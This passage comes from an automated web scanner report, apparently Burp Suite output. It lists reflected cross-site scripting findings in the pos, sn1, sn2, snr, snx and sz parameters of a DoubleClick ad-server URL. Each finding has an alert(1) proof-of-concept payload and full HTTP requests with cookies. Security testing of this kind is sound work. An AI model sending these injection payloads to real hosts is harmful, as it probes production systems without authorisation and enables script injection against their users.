%3B61866713%3B3454-728/90%3B41392052/41409839/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt158541A261966%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post3a6ae"-alert(1)-"34c68b6b7ed&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto=http://www.unum.com/voluntary");
var fscUrl = url;
va
...[SNIP]...

4.20. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [pos parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N4031.276948.NYTIMES.COM/B5299202.3

Issue detail

The value of the pos request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload f3ecc"-alert(1)-"751fd290be4 was submitted in the pos parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N4031.276948.NYTIMES.COM/B5299202.3;sz=728x90;pc=nyt158541A261966;ord=2011.05.12.11.38.07;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAdf3ecc"-alert(1)-"751fd290be4&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/03/private-equity-titans-finds-common-ground/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:40:16 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6461

document.write('\r\r\n\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
3%3B3454-728/90%3B41392052/41409839/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt158541A261966%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAdf3ecc"-alert(1)-"751fd290be4&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto=http://www.unum.com/voluntary");
var fscUrl = url;
var fscUrlCl
...[SNIP]...

4.21. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [pos parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N4031.276948.NYTIMES.COM/B5299202.3

Issue detail

The value of the pos request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 479c8'-alert(1)-'10d3faac88e was submitted in the pos parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N4031.276948.NYTIMES.COM/B5299202.3;sz=728x90;pc=nyt158541A261966;ord=2011.05.12.11.38.07;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd479c8'-alert(1)-'10d3faac88e&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/03/private-equity-titans-finds-common-ground/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:40:21 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6461

document.write('\r\r\n\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
3%3B3454-728/90%3B41392052/41409839/1%3B%3B%7Eokv%3D%3Bpc%3Dnyt158541A261966%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd479c8'-alert(1)-'10d3faac88e&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto=http://www.unum.com/voluntary\">
...[SNIP]...

4.22. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [sn1 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N4031.276948.NYTIMES.COM/B5299202.3

Issue detail

The value of the sn1 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 9e249'-alert(1)-'67112d083f4 was submitted in the sn1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N4031.276948.NYTIMES.COM/B5299202.3;sz=728x90;pc=nyt158541A261966;ord=2011.05.12.11.38.07;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb9e249'-alert(1)-'67112d083f4&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/03/private-equity-titans-finds-common-ground/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:41:37 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6461

document.write('\r\r\n\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
x_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb9e249'-alert(1)-'67112d083f4&goto=http://www.unum.com/voluntary\">
...[SNIP]...

4.23. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [sn1 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N4031.276948.NYTIMES.COM/B5299202.3

Issue detail

The value of the sn1 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d22bd"-alert(1)-"1f5f893988d was submitted in the sn1 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N4031.276948.NYTIMES.COM/B5299202.3;sz=728x90;pc=nyt158541A261966;ord=2011.05.12.11.38.07;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cbd22bd"-alert(1)-"1f5f893988d&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/03/private-equity-titans-finds-common-ground/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:41:32 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6461

document.write('\r\r\n\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
x_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cbd22bd"-alert(1)-"1f5f893988d&goto=http://www.unum.com/voluntary");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var openWindow = "false";
...[SNIP]...

4.24. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [sn2 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N4031.276948.NYTIMES.COM/B5299202.3

Issue detail

The value of the sn2 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d7093"-alert(1)-"1e87edde91c was submitted in the sn2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N4031.276948.NYTIMES.COM/B5299202.3;sz=728x90;pc=nyt158541A261966;ord=2011.05.12.11.38.07;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30ccd7093"-alert(1)-"1e87edde91c&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/03/private-equity-titans-finds-common-ground/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:40:54 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6461

document.write('\r\r\n\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
6%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30ccd7093"-alert(1)-"1e87edde91c&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto=http://www.unum.com/voluntary");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowsc
...[SNIP]...

4.25. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [sn2 parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N4031.276948.NYTIMES.COM/B5299202.3

Issue detail

The value of the sn2 request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4194f'-alert(1)-'19a55e40fc5 was submitted in the sn2 parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N4031.276948.NYTIMES.COM/B5299202.3;sz=728x90;pc=nyt158541A261966;ord=2011.05.12.11.38.07;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc4194f'-alert(1)-'19a55e40fc5&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/03/private-equity-titans-finds-common-ground/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:40:58 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6461

document.write('\r\r\n\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
6%3B%3B%7Esscs%3D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc4194f'-alert(1)-'19a55e40fc5&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto=http://www.unum.com/voluntary\">
...[SNIP]...

4.26. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [snr parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N4031.276948.NYTIMES.COM/B5299202.3

Issue detail

The value of the snr request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 31578'-alert(1)-'30af61f0de1 was submitted in the snr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N4031.276948.NYTIMES.COM/B5299202.3;sz=728x90;pc=nyt158541A261966;ord=2011.05.12.11.38.07;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick31578'-alert(1)-'30af61f0de1&snx=1305199279&sn1=1e601a2d/cdea53cb&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/03/private-equity-titans-finds-common-ground/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:41:11 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6461

document.write('\r\r\n\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick31578'-alert(1)-'30af61f0de1&snx=1305199279&sn1=1e601a2d/cdea53cb&goto=http://www.unum.com/voluntary\">
...[SNIP]...

4.27. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [snr parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N4031.276948.NYTIMES.COM/B5299202.3

Issue detail

The value of the snr request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5c6b6"-alert(1)-"a19ae64d3de was submitted in the snr parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N4031.276948.NYTIMES.COM/B5299202.3;sz=728x90;pc=nyt158541A261966;ord=2011.05.12.11.38.07;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick5c6b6"-alert(1)-"a19ae64d3de&snx=1305199279&sn1=1e601a2d/cdea53cb&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/03/private-equity-titans-finds-common-ground/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:41:07 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6461

document.write('\r\r\n\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
D%3fhttp://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick5c6b6"-alert(1)-"a19ae64d3de&snx=1305199279&sn1=1e601a2d/cdea53cb&goto=http://www.unum.com/voluntary");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "ne
...[SNIP]...

4.28. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [snx parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N4031.276948.NYTIMES.COM/B5299202.3

Issue detail

The value of the snx request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 351e4"-alert(1)-"2b62cf2cc42 was submitted in the snx parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N4031.276948.NYTIMES.COM/B5299202.3;sz=728x90;pc=nyt158541A261966;ord=2011.05.12.11.38.07;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279351e4"-alert(1)-"2b62cf2cc42&sn1=1e601a2d/cdea53cb&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/03/private-equity-titans-finds-common-ground/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:41:20 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6461

document.write('\r\r\n\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279351e4"-alert(1)-"2b62cf2cc42&sn1=1e601a2d/cdea53cb&goto=http://www.unum.com/voluntary");
var fscUrl = url;
var fscUrlClickTagFound = false;
var wmode = "opaque";
var bg = "";
var dcallowscriptaccess = "never";

var
...[SNIP]...

4.29. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [snx parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N4031.276948.NYTIMES.COM/B5299202.3

Issue detail

The value of the snx request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload aa31c'-alert(1)-'7df3705589b was submitted in the snx parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N4031.276948.NYTIMES.COM/B5299202.3;sz=728x90;pc=nyt158541A261966;ord=2011.05.12.11.38.07;click=http://www.nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279aa31c'-alert(1)-'7df3705589b&sn1=1e601a2d/cdea53cb&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/03/private-equity-titans-finds-common-ground/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:41:24 GMT
Cache-Control: private, x-gzip-ok=""
Content-Length: 6461

document.write('\r\r\n\r\r\n<script src=\"http://s0.2mdn.
...[SNIP]...
nytimes.com/adx/bin/adx_click.html?type=goto&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279aa31c'-alert(1)-'7df3705589b&sn1=1e601a2d/cdea53cb&goto=http://www.unum.com/voluntary\">
...[SNIP]...

4.30. http://ad.doubleclick.net/adj/N4031.276948.NYTIMES.COM/B5299202.3 [sz parameter] previous next

Summary

Severity:	High
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adj/N4031.276948.NYTIMES.COM/B5299202.3

Issue detail

The value of the sz request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload d6f64'-alert(1)-'07e837f5fb5 was submitted in the sz parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Request

GET /adj/N4031.276948.NYTIMES.COM/B5299202.3;sz=728x90;pc=nyt158541A261966;ord=2011.05.12.11.38.07;click=http://www.nytimes.com/adx/bin/adx_click.html?type=gotod6f64'-alert(1)-'07e837f5fb5&opzn&page=blog.nytimes.com/dealbook/post&pos=TopAd&camp=UNUM_2011_1698712-nyt1&ad=UNUM_728x90_B5299202.3&sn2=1952ca62/2ca30cc&snr=doubleclick&snx=1305199279&sn1=1e601a2d/cdea53cb&goto= HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://dealbook.nytimes.com/2011/05/03/private-equity-titans-finds-common-ground/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.65 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __gads=ID=3cde97f19b2af13f:T=1303423671:S=ALNI_MZrSVhBI9QqwoFvqOiF9aToOUXXzA; id=22fba3001601008d|844392/262198/15106,2333498/779460/15106,2895566/1020157/15103,1031442/454155/15097,1786739/600125/15097,799974/1016776/15096,2818894/957634/15096,2584283/504803/15096,865138/565971/15096,2789604/880805/15096,1359940/457091/15096,1672981/717726/15092,2716759/964419/15088|t=1303072660|et=730|cs=-8oc1u1u

Response

HTTP/1.1 200 OK
Server: DCLK-AdSvr
Content-Type: application/x-javascript
Date: Thu, 12 May 2011 11:39:55 GMT
